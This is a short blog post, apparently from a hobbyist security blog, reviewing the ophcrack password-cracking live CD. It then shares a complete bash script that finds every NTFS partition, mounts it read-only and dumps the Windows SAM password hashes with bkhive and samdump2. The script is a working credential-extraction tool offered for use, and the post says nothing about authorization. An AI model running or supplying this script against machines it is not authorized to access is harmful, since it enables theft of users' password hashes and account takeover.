Automated windows hash grabbing.
I was playing around with ophcrack this week which is included in the katana suit. I’d recommend looking into both of these if you’re never heard of them, anyway, ophcrack has a live boot cd that boots directly into a LM and NTLM password cracker, dumps the hashes from the local machine and starts cracking with some rainbow tables.
It works fairly well but could be a lot better, for one the live distro they use is real bloated considering all it does is crack passwords, secondly they could have made saving the results a lot easier. The only thing I found real novel was dumping the hashes automatically, for your enjoyment here’s a bash script that goes through all NTFS drives and tries to dump the hashes 
#!/bin/bash
function dumpfrommount {
if [ -e "$1/Windows/System32/config/SAM" ]; then
bkhive “$1/Windows/System32/config/SYSTEM” /tmp/systemkeyfile.txt &> /dev/null
samdump2 “$1/Windows/System32/config/SAM” /tmp/systemkeyfile.txt 2> /dev/null
rm /tmp/systemkeyfile.txt
fi
}for curdrive in `fdisk -l | grep NTFS | grep -o -E ‘^/[^ ]+’`; do
curmountpoint=`mount | grep $curdrive | grep -o -E ‘ /[^ ]+’`
if [ -z $curmountpoint ]; then
mkdir /tmp/tmpmount
mount -r $curdrive /tmp/tmpmount &> /dev/null
dumpfrommount /tmp/tmpmount
umount $curdrive
rmdir /tmp/tmpmount
else
dumpfrommount $curmountpoint
fi
done
